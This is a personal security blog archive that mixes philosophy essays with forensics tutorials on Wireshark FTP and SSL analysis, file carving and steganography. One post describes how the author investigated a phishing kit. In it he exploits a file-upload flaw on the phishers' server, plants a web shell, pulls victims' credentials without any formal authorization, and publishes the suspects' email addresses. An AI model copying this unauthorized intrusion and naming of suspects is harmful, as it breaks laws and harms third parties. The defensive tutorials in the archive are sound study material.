Wednesday, September 26, 2018

Philosophy of corruption

Hey there!

Today I am going to talk about my philosophy on a very important topic, that is corruption.

Day by day we see lot of people talking about corruption, expressing their distress on corruption.
But wait, what is corruption?
Can someone define what it is, in actuality?

Many people relate corruption to money. Some relate it to power, while some relate it to character.

Power!
In this scenario, a person often tries to misuse his power which was vested on him to do good. The reality is adverse. Have you ever thought why does he do that?
Simple; because he can.
If  a person has power, he feels invincible and keeps trying to check his power all the time either to showcase it in front of his friends, or other colleagues with an intent to gain their appreciation.

Corruption is not about money or power. It is about your hidden thoughts and intention.
Knowing if a person would be corrupt (provided the chance of him getting power and money) can be easily identified.
For example, tell a man that you are going to pay him 10 lakhs, and ask him what he is going to do with that money. This, my friend is a very good technique.

The other thing I often relate to, is this game called "Grand Theft Auto". Its a very good game which allows you to do whatever you wanted to do in real life, like .
I play this game a lot. I used to crave for buying super cars in the game. I earned a lot in that game to buy a super car but still I would steal vehicles from other people. This doesn't end here. Once I take the car, the driver runs away and I too used to run behind him and hit him. Some of them used to run away after getting hit, but some of them used to fight back. When they used to fight back I used to hit them and eventually kill them. Why? Just because nobody could kill me and I was literally invincible in the game? ..but that didn't make me a better person, but I used to hit random people for 'fun'. When we see such things in real life, we may think how could a person be this insane, but when it comes to us (atleast in a game) where we are invincible, we hurt people for fun?

A similitude has been coined.

  

Wednesday, August 9, 2017

Phishing in a well

I received an official mail asking to confirm if a mail they have received was a legitimate one, or is something suspicious.
The e-mail had a reply-to address of update@ingvysyabank.co.in

The domain ingvysyabank.co.in is a genuine domain registered by ING Vysya Bank but is not active.
[Note: Click on Images to enlarge] 



Now, I had to check if the e-mail ID really exists.




Without further ado, I started looking into the mail, and it also had an attachment.

I downloaded the attachment (a html file) and opened it in the web browser. It was a (fake) login page of ING Vysya Bank with a form asking for user credentials. I wanted to know where the data would be submitted when a user clicks on the 'Submit' button, so entered random details and clicked on 'Submit' button. I could see in the status bar of my browser that the data is going to some IP 207.210.xx.xxx and then it was redirecting us to the genuine website of ING Vysya Bank.

So far so good. I just wanted to check if the page was working as it was meant to.


Next step was to see the source code of the html page to find where exactly the data was going on the click of the 'Submit' button.

The source code was obfuscated using the encodeURI() function of JavaScript and on run-time it was being decoded. The source code was Greek to me because of the obfuscation. I had to somehow decode the content to view the source code in clear text. I came to know about the decodeURI() function which was the need of the hour. I used this technique to decode the source code into clear text. The data was double-encoded, so I had to double-decode the content using the unescape() or decodeURI() function to get the clear text, which I finally got after sometime.

Now I knew what exactly I need to look for, in the source code. It was the "<form action>" tag, which along with the request method of "POST" would submit the data to some host.

It was some "http://207.210.xx.xxx/~camion/remax/yes/is_vector.php".

Great! Now we know where our data is going to.
By the way, you already know that we cannot view the (actual) source code of a php file right?
It pre-processes before displaying the page. So, we can view only the code of the displayed page, but not the code which created the output.

So, now our aim was to see the code of this file "is_vector.php". I did some directory traversals, to browse through various directories, and found a "file upload" vulnerability in some page there, and thats where I fired my favorite madspot shell, and we had access to all the files on that directory and all other sub-directories.

It took some time to find out which directory had that juicy information relevant to this case.
Okay, but first I was interested in identifying the last accessed IP from the access logs, and it was 41.206.15.41.
A quick WHOIS lookup gave the information that the IP belongs to Nigeria. (It could be a proxy or might be used for RDP but anyways thats not what we want to find out, atleast in this case)
   

Now moving to view the actual source code of the php file "is_vector.php", I traversed through the path to reach the file viewed the source code and found that the data was being mailed to three IDs namely cyber_crime52@yahoo.com . mrlogin801@gmail.com , and johncooperesq@live.com




To know the potential victims of this attack, I would have to hack (get) into the above accounts and check their inboxes for the details they have received.

Luckily, I believe somebody was insecure amongst them and had also added a code in the end of that php file which would also append the data into a text file in some directory there, along with sending the data via their mailer to the above mail IDs.

The mailer was found to be configured by some Heru Kusnadi (heru.kusna@gmail.com) who might be the main person behind this, or could just be another partner in crime.




Uhm, anyways after deep-walking into those dozens of directories, finally I got the data related to the dump of credentials already submitted by some potential victims.


As I was not concerned directly with the victims outside India, I was looking for some data related to Indians. I could find a dozen of valid responses (proper credentials) and luckily they had fortunately or unfortunately filled their genuine mobile numbers too. It was easier for the team to contact and inform them to change their credentials (ATM PIN, transaction password, email password, etc).



By the grace of Almighty, there was no loss to any of our potential victims and they had changed their credentials. They thanked us for the timely help and some of them also burst into tears, but this was out of happiness as some victims had recently transfered their entire savings into this one account of theirs.

What did I get in return? Happiness in their voices, and a feeling of content both individually and also towards the Department which they now trust.
Well, that is more than enough! :)
There was no official complaint as-such but sometimes we take the action like 'Minority Report' ;)

Anyways, If you feel anything suspicious (as in mails, lottery SMSes, etc) kindly report it to your local Cyber Cells via mails atleast, and also do not hesitate to contact me at itsmerif[at]TheLogicalKid.in

The complete documentation including the "Technical Process" can be provided if you want to study the details. Shoot me a mail.

See you soon.

Greetz to The CliQue - Guy244, GSM50, SajjutXt, Nazim_KANK, F-roZ, i-maD

Regards,
itsmeRiF
The Logical Kid

Disclaimer: Specifically added the mail IDs of the suspects in a searchable method so that it can be indexed on Google when you doubt their mails and search for their e-mail IDs. I hope this post gets displayed in the search results.

Tuesday, August 1, 2017

Happiness - within and around (extended)

Hello! Long time no see right? Hehe, was busy in a couple of tours around the Indian Sub-continent. :D

Well, this post is non-technical and more of a philosophical sort-of, as I have been traveling a lot..and maybe that is when you keep thinking about such stuffs when you gaze over the open skies! :D
This post is neither intended for brainwashing you, nor dominating your mind with my thoughts.
It is just my sole experience, and I hope that you may agree with all or at least some of my thoughts here.
        Sometimes you feel that being rich is the only way of being happy, and for that you work all your life to earn that MONEY which you apparently think that you need it, to be happy.
Don't you think you get many moments of happiness during this journey of yours of getting rich ?
Uhm, let me create a scenario according to your logic of staying happy(ier,iest)

    Assume that you want to buy your dream car and that costs around 30 lakhs (Hey..lets be practical here, and lets ignore your unrealistic range of car worth crores, in this scenario).
So now, you have 30 lakhs, and you are good to go with your dream car.
Next what ?
You still would have dilemmatic thoughts as to buy the car with all the 30 lakhs you have, or settle for something of lesser cost and save the remaining money!

    If you go reluctantly for the 1st choice and go for buying the car with all the money you have, what about the cost to be incurred on the car again ? Fuel, servicing, oh yea.. a good garage for the car ?
Now you start thinking about switching to 'ALL Brand' level, meaning "Everything of a HIGH market value, or standard" and you crave for a good audio system in the car, renovating your place to match the standard of your car.
The point is, you are NOT enjoying the presence of your car and thinking about the other things now.
You are even planning to arrange for a good garage for your car, the audio system, racing decals, and what not!
    Lets assume that you had your car all set-up with the latest audio system and all those seem-to-be-good stuff somehow by your salary, etc.. will you be happy now ?
If you think that you will be happy, its great! Sadly reality is not that way. You will crave for a better car sooner or later.. but for sure.
Statistically, you will be happy for a month, or a couple of them.. and get USED to the comfort and will seek better comfort or a HIGHER standard.
This is a continual process and this keeps on repeating until and unless your desires are controlled.


    Here comes an incident of my life, wherein I realised another fact about happiness.
This happended when I was in my 4th standard.
My parents had come to my school to take some documents pertaining to application of my Passport, and it was all BROADCASTED in my class by my class teacher that I was going to Saudia Arabia and my passport application is being filed.
Everybody was 'all smiles' in my class and suddenly I felt being RICH! It was unexpected for me who never left Hyderabad until then and now was going out of country. :D
        This doesn't end here. Everybody at home also made me feel the same, and I was really very happy and tried behaving in the best manner (something of that sort ) and all that drama.
        I don't remember when this thought of me going to Saudia Arabia disappeared from my mind until my 9th class when actually I went to Saudia Arabia for the first time.
What does this mean now ? I hadn't been to Saudia in my 4th standard itself but the thought itself made me happy, and I already felt as-if I was there.
       A survey also says that people are lot more happier in planning their vacation than going on the vacation itself.
The above survey makes my point stronger now, ain't it ? ;)

    Uhm, I just remembered an incident in my life, which I consider an important event in my life.
I was in my 9th standard and had gone to Saudia Arabia for a vacation.
In earlier days there, I used to go shopping with my papa and was limited to buying few items (yea.. because my frequency of shopping was more :P). 
I used to grab all that was wanted by me. :P

    Then came a day when my papa told me,"Take WHATEVER you want today!"
What next ? Theoretically if anyone tells you so.. you never waste this chance and bump into all nooks and corners of the mall and grab everything you ever wanted to buy.. but on contrary I was PUZZLED as to WHAT I NEED and WHAT TO BUY, as I had freedom to buy everything I wanted that day.
    No! I wasn't getting emotional or I did even think of the prices, no.. nothing! I was a 14 year old kid and was as every other kid who craves for toys and all that fancy shopping!
Then came the enlightenment! I realised that only the words of my papa which literally meant that he can buy ANYTHING for me were more than enough for me.. and equivalent to that ANYTHING.
    Since that day I had a change of my mind and realised that happiness is NOT in BUYING things, it is basically in thinking that YOU can buy it.

    Now, lets assume a different scenario, directly related to MONEY.
During my years of Graduation, my group CliQue had planned for a party at the end of Graduation and we thought of contribution of 5000 Indian Rupees from each one in the group, that would be 35k in total and planned to spend it lavishly at the Taj Hotel.
We would receive scholarship from Government, and so thought we will start saving that for the party.
After completion of our Graduation, though we had a lot more than the planned money, we were satisfied with having "paratha with aaloo" in a local restaurant and tea, roughly amounting to 500 Rupees max.


Let me imagine what would happen if someone would really think of spending all that 35k.
I bet they wouldn't, well atleast according to me who had lived that moment.

    
Lets consider you really feel that you WILL spend that money no-matter what, and without any second thoughts..
Okay! You spent all that without second thought.. had gala time for an hour, a couple of hours, or say 1 day..!
    Obviously! You would have enjoyed a lot and yeah.. it would have obviously made you HAPPY too.. but what were the elements of happiness basically there ? Your money?

Obviously NO! If money would make you happy, you wouldn't spend them at all! :)
    You were happy because you probably weren't ALONE. You were sharing the enjoyable moments with the people you LIKE, LOVE, or CARE.
So basically YOUR happiness was NOT by your money, but by the HAPPINESS of the people you were with.
    So, the gist of this post is that real happiness is in happiness of the people who matter to you.
Keep spreading happiness, you will never regret this! :)
Hope this post did leave some impact on you!

I firmly believe that what can be bought, can be eventually bought.Afterall it requires only money which can be earned someday. Don't worry about that. Worry about the things which cannot be 'bought'.

Having said that, time for me to wrap it up.

Thanks for reading. Take care! :)

Regards,
itsmeRiF


Monday, June 19, 2017

Modern Art - The Costliest one

Hey!

I started learning to paint as this is a recession-proof business and the older it gets, the more vintage value it has.

Here is an attempt to paint one of the costliest piece of Art.


The above piece of Art was sold for a whooping $ 43,800,000 USD

Well, I tried re-creating the same as a back-up plan for when the Government fires me from my job.




Don't you think I have created it close enough?
If you want to buy, kindly contact me at itsmerif[at]thelogicalkid.in


Only one piece remaining, as I spent weeks and weeks to make one piece using Microsoft Paint, a mouse by Dell, and an Asus Machine which had the capacity of creating Rainbow Tables, but I preferred making this.

Bid starts from $ 438 USD (~0.00001 % of the Real worth)

Thursday, June 9, 2016

Analysing FTP traffic using Wireshark - The Logical Kid

Hello! I am back with the new post, and this deals with analysis of FTP traffic using Wireshark.
We will be dealing with identification of data sent/received over FTP and retrieval of files (if any downloaded/uploaded).


Pre-requisites:
Wireshark
* a PCAP file which may have FTP traffic captured. I have got my own, and if you do not have, you can download it from here.

Note: Click on the images to enlarge

Let's begin!
1. Open the pcap file in Wireshark.



2. To find out if there is any FTP traffic in it, just apply the filter 'ftp' in the display filter.













3. Now when you see FTP traffic, find out if any data was downloaded by a user. To find out, just apply the display filter ftp.request.command=="RETR"













4. You can see a retrieve (RETR) request by a few frames, let us see the frame number 767 which was the first instance.














5. Now clear the filters and scroll down to a couple of packets before frame 767. If you look at the frame number 762, the "info" tab gives some information. If you click on the "packet details" pane and on "File Transfer Protocol (FTP)" as shown in the picture below, you will find a field called "passive port". Note down the port number of that field and also the source IP Address of the same.





 We found that the IP Address is 149.20.20.135 and the port number is 30893

6. Now we need to find out any activity to/from the IP address 149.20.20.135 over the port 30893.
To achieve the same, apply the following filter in Wireshark: ip.src==149.20.20.135 and tcp.port==30893
We get the following output.















7. What next?  Observe the frame number 765? We can see some activity over the port 30893 from the source IP 149.20.20.135. Lets "Follow TCP stream"
















8.  Select the data from the source (149.20.20.135) to the destination.
















9. In step 3 we have seen that user had requested for download of a .rpm file, so let us assume it to be the same for the mean time. Let us save the stream content as "something.rpm"
















That's it! Your work is done (well, almost). Now do not try executing the file yourself directly as we are not sure about its nature; can be a malware too. Anyways you can try executing in a sandbox environment isolated from network just in case you are curious to know.

Hope this was informative and I didn't waste either of our time.

Will be back soon with a new post.
Until then, keep reading and keep spreading the word.

Regards,
itsmeRiF
The Logical Kid

Monday, March 21, 2016

The Power of Social Media in dealing with day-to-day problems! - The Logical Kid

Hello! A warm welcome to the blog once again. Today I am going to talk neither about Technology nor about Philosophy but something which is relevant though.

My last post was about Social media where I had focused on detecting fake content which was spreading virally over various social (media) platforms.

This post is about my personal experience in dealing with one of many daily problems solved using the social media

tl;dr (long story short) I was conned by two petrol pump employees, and then action was taken on them by the concerned department, thanks to the power of social media.


This starts with the day I happened to re-fuel my bike at a Petrol Station at Barkatpura, Hyderabad. I was always suspicious about this place, but as this station was the first one on my way to office I often used to re-fuel my bike here.

The modus operandi of those people was as follows:
When a person used to ask for re-fuel, the pump operator used to stand in front of the meter apparently to block the meter reading, and the other (cashier) would stand opposite to the operator. As the re-fueling process would start, the cashier would wait for some time and distract the customer asking him to re-fill air in his vehicle and as soon as the person got distracted and set his eyes off the meter, the operator would stop filling and reset the meter and would claim that he had completed filling.

One morning, as usual I went to this petrol station and asked the operator to fill petrol for 100 Rupees. I (with the suspicion in mind) started staring at the meter with full concentration, but somehow the cashier distracted me by shaking my bike and telling me to fill air. After that I turned back to see it was reading '70' on the meter, and I told the operator to fill the remaining 30, and whoosh! The meter was suddenly reset to '0' and the operator told me "It was 100 and not 70" and I (feeling angry, and helpless at same time) was not having any evidence to prove my point as the meter was already reset.

I moved on, and reached office thinking to be careful from next time, but this guilt of a loss of 30 Rupees per 100 Rupees was bothering me and I didn't want this to happen to anybody else too. I had to do something about this.
I had a couple of things in my mind: First, I had not taken any bill so that I could relate it to my transaction. Second, there was no CCTV installed in the premises of that station, atleast not around the pump.

I discussed this with a colleague at Office and he explained me how for every transaction at pump, logs are generated which contain the details of the amount for which petrol was filled in every session, with date and time stamps.

Then came an idea. We have heard a lot about good governance using social media, now it was time to put it to litmus test. I searched for the complaints board on the official site of HP, found their complaints section and posted my complaint there.



























I wasn't satisfied because the complaint section was limited to just about 200 characters and I couldn't elaborate everything.
So, I found out the official handle of Hindustan Petroleum on Twitter and tweeted them my complaint to see if I could bring it into their notice as early as possible.

To my surprise, I received a reply within 15 minutes from their twitter handle.










I e-mailed them the details at the above mentioned e-mail ID.














I then sat back and waited to get an update from the concerned department.
After 5 days from the date of reporting I received call from the Deputy Manager (Vigilance) of HP for Hyderabad and she asked me to elaborate the incidence and also informed me that those (two) employees were proven guilty and were fired. The Manager had also apologized for the inconvenience.

Response time: 5 days


Believe in the power of Social Media. Use it for the good. Things take time to get sorted, but give it a try.
That's all folks!
This post was to show how Social Media can be put to use to deal with our real life problems and not only for dealing with candy crush requests.

I rest my case.
If you have any queries, you can simply comment below, or can mail me at itsmerif[at]thelogicalkid.in

See you soon with a new post!

Regards,
itsmeRiF
The Logical Kid









Monday, February 1, 2016

Social media Analysis - Dealing with content posing 'forced' negativity & How to be a myth buster. - The Logical Kid

Lately, there have been so many posts circulating over different social networks which have nothing to do for the betterment, but can be used to create disturbance in communal harmony.

In this era where people debate over Religions with statements like "My religion is superior to yours" and/or something like "Your religion is the cause of terrorism", etc, people have started using social media as a force multiplier in creating hatred among various communities for the reasons best known to them, because obviously there is nothing good in fighting for proving that so-and-so religion is better. If its better, then you don't need to shout and by the way if its better, then first you should follow it sincerely instead of imposing it on others.

My interest, or a 'part' of my work includes keeping eye on the 'potential' hate mongering people and I follow the posts they make, try to verify the authenticity and detect "caption spoofing" (if done) and then read and try to understand the comments the people make on their posts (mostly in favor of them) and try to analyse the 'sentiments' which made them vulnerable to believe whatever is posted by the people they follow.

We do not need to worry about the people who talk 'positive', or at least share the content which is true. The problem is with the people who share anything which they know can create controversy over social media, and they themselves (mostly) do not know whether the content is authentic.

Let me take an example:

While I was browsing through my Facebook news feed, I happened to come along a page which was sharing some content with a 'negative' sentiment to be followed along with it and could disturb the harmony between some communities.















While the post was just gaining momentum as people started sharing this content, my focus was on verifying the authenticity of this post.

Firstly, I downloaded the photo, checked if it was morphed / doctored.
By using tools for 'image based search', we could somehow assume that it wasn't morphed, but had been touched by using some filters to increase the contrast.
As a supporting document to my assumption, I have added the original picture for reference below:

























As seen here, the upper part contains the original picture, and the lower part contains the same picture on which some filters have been applied.

Now coming to the story behind the picture.
Well, for this there are many tools over the internet, but I somehow prefer using Tineye and/or Google's own image based search tool.

The logic to assume which picture is authentic is, sometimes simply looking for the date it was posted. The older it is, the more are the chances of it being legitimate.
Anyways, there is much to it besides this (date), which helps us ascertain the facts.

After searching over a couple of archives where the photo was posted, I could find a website where this content was posted much before it was posted on the other sites.
I gave it a thorough read, and could be sure that this photo was taken somewhere in Thailand.






































On further lookup, I found a video which was aired on a News channel, which could be used for further supporting our assumption.








I rest my case.

- Arif Ali Khan (itsmeRiF)

Wednesday, January 27, 2016

Decrypting SSL traffic using Wireshark! - The Logical Kid

Hello! All.

Like me, you as-well might have heard quite often that the Government is able to 'read' all our 'secure' traffic too, and they do it by using some secret keys, or so. Did you hear the same?

Well, even if you have heard, or have not heard, thats the way they do it! ;)

Now to understand how they do it, the curiosity led me to some good forums over the internet where they explained how they do it.

First things first. To make this happen, the Government needs to have the decryption key, probably the private key.
We will emulate the same here.
Things we require:

1. SSL Traffic dump
2. Decryption key (private key)
3. Wireshark (used Version 2.0.0rc3)

Patience, people! I will provide the link for sample SSL traffic dump and all that is required for this task after I explain; somewhere down the lane.:)


1. Run Wireshark, and open the sample SSL traffic dump file.



The data gets loaded.

 

So far so good, but then you can see some (encrypted stuff) Greek or Latin as we casually refer to something of that sort. Let me presume that none of us know either of these. ;)

In the above picture you can see (under data) that the data is encrypted.
So, what next?

2. Click on Edit -> Preferences -> Protocols -> SSL and click on 'Edit' beside "RSA keys list" as follows:





3. Click on "+" and fill the fields IP Address, Port, protocol with 127.0.0.1, 443 and http respectively.

4. Now double click on the 'Key file' parameter and browse and select the private key file.

Thats it!



You will see some extra panes in the window, as follows:


You can see that the SSL traffic was decrypted and explained in clear HTTP.

Lets compare a couple of frames as to how they looked when encrypted, and also after decryption.



Simple, right?

This was also done for the test given on 'Pentester Academy' with respect to the module 'Decrypting SSL Traffic' in WAP Challenges. If you have enrolled for that course, this will help in solving it. :)

Uhm, now the stuff I used here can be downloaded from here.


Now whenever somebody says that Government is able to read all your 'secure' data sent to an xyz website, you now know that they probably have the private key used by that server. :)

Thats all folks!
Kindly leave comments which may include suggestions, queries, and anything which can make this post effective in doing what it was meant to do.

Regards,
itsmeRiF
The Logical Kid  

Monday, December 28, 2015

File carving & Steganography explained! - The Logical Kid

File Carving


Note: the template was designed for Desktop browsers. Kindly excuse for the display in mobile browsers.


What is file carving?

File carving in literal terms, is the technique of extracting (juicy) files from a given block of (raw) data. This technique is practically used in Digital Forensics to extract important files like pictures, documents, excel sheets, etc.


Steganography

What is Steganography?Steganography in literal terms, is the technique of hiding data in data (say another file) basically to evade surveillance as a matter of privacy.Example: Hiding an image in an image. Its simple like hiding your girlfriend's picture in your picture and all everybody can see is only your picture.


What we are going to deal with in this post?

At first, we are going to see the concept of manual File carving technique(s) then we move on to understand Steganography and practice it a bit, and later we apply file carving technique to try and detect steganography and retrieve the forbidden information from the files to which steganography was applied


Tools of the trade:
HxD – Hex editor
Obama & Osama – Don’t worry, I was talking just about the images. :)

..and let the games begin!


1. As I am dealing with Osama and Obama, lets download one picture each, of both.











2. Now lets use our Hex editor (I am using HxD) to open the file obama.jpg

Look at the first four bytes of data of the image.
Can you see FF D8 FF E0 in hex, or ÿØÿà in ASCII ?

These are called magic numbers or file signature.

A JPG basically has FF D8 FF E0 (E1,E8) in header and ends with FF D9 (ÿÙ in ASCIIin trailer.


JPG File Signature


Now, if I try to rename obama.jpg into obama.mp3 lets see what happens.



As you can see, the extension-change in the file made it be detected as an audio file by my default mp3 player.
Try playing it?

Obvious error right ? You cannot expect an image to play music for you! 

Lets re-open that changed mp3 file with HxD















Do you see the header and trailer of JPG in this 'MP3' file? Can you suspect this MP3 file to be a JPG file?

To validate your assumption, just change the file extension to .jpg and see what it has in store for you.
Else, just open that mp3 file with your default image viewer.

Sounds interesting, right?
This is what any data carving tool actually does. It identifies the file by its signature from the raw data and bounds a file between its header and trailer to save it with the extension associated with it, be it JPG, GIF, MP3, or a .doc file.

Now, lets try adding some data to obama.jpg - a simple text line will do.


To do it, just open your obama.jpg file in HxD.

At the end of the file, add some content - A statement will do.
Its as simple as follows:




















This can be done simply by typing.
(The content in red is what I have added).

Just save the file with any name with extension .jpg
Let me save it with obama.jpg itself.

Lets open obama.jpg with HxD and see what we find.





















Voila! We can see that text in the hex data, and even the image opens flawlessly in your image viewers.

This is a basic example of applying steganography to add text in an image file.

Now lets work on a concept where we apply steganography to add image in an image file.


For this lets take two images - obama.jpg and osama.jpg

To-do: Hide osama.jpg into obama.jpg

1. Open both the files (obama.jpg and osama.jpg) in HxD.

2. Hit 'Ctrl + N' to open a new blank window.

3. Copy the whole content from obama.jpg and paste it into the new window

4. Copy the whole content from osama.jpg and paste it at the end of the file in the new window.

5. Save as magic.jpg
























6. Thats it! Now check how the thumbnail looks like in the place where you saved magic.jpg






Do you 'see' the difference between the original  obama.jpg and this magic.jpg ?







No! Right? Lets try opening it in your image viewer.





















Do you see Osama anywhere in the pic? If you see him, you haven't got good sleep I suppose. ;)
I understand hallucination too! ;)

Simple, right? Now if you ask me where has Osama gone?

File Carving has the answer! :)


Lets apply file carving technique learnt earlier in this post.

1. Open magic.jpg in HxD.
























2. Now hit 'Ctrl + F' and type in "ÿØÿà" (without quotes) and hit enter. Hit F3 to find next match.
























As you can see in this screenshot, you can find two matches for the text-string "ÿØÿà" - One being the start of the file, and the one shown in this screenshot.
This can simply mean that there are two images in the image we are analysing.

Lets try to retrieve / extract that image data now.

3. Copy the content from the 2nd "ÿØÿà" to the end of the file, or probably till the next "ÿÙ" which marks the end of a JPG file, and paste it into a new blank HxD window.



























4. Save the file as 'magic revealed.jpg'
























5. Open 'magic revealed.jpg' in your image viewer.
















Voila! The magic has been revealed!

This is simple 'logic' behind steganography and File Carving.

Keep exploring, to learn the nuances of increasing the efficiency of File Carving and also to decrypt files on which advanced steganography techniques were applied.

For more details on File signature of various file types, and various other references, visit:
File Signatures (A site by Gary Kessler)

Happy exploring!

Feel free to share your views on this post. Any suggestions to make it better are always welcome.

You can find me on:
Facebook | Twitter | LinkedIn | Google



"Every expert was once a noob!"


Regards,
itsmeRiF
The Logical Kid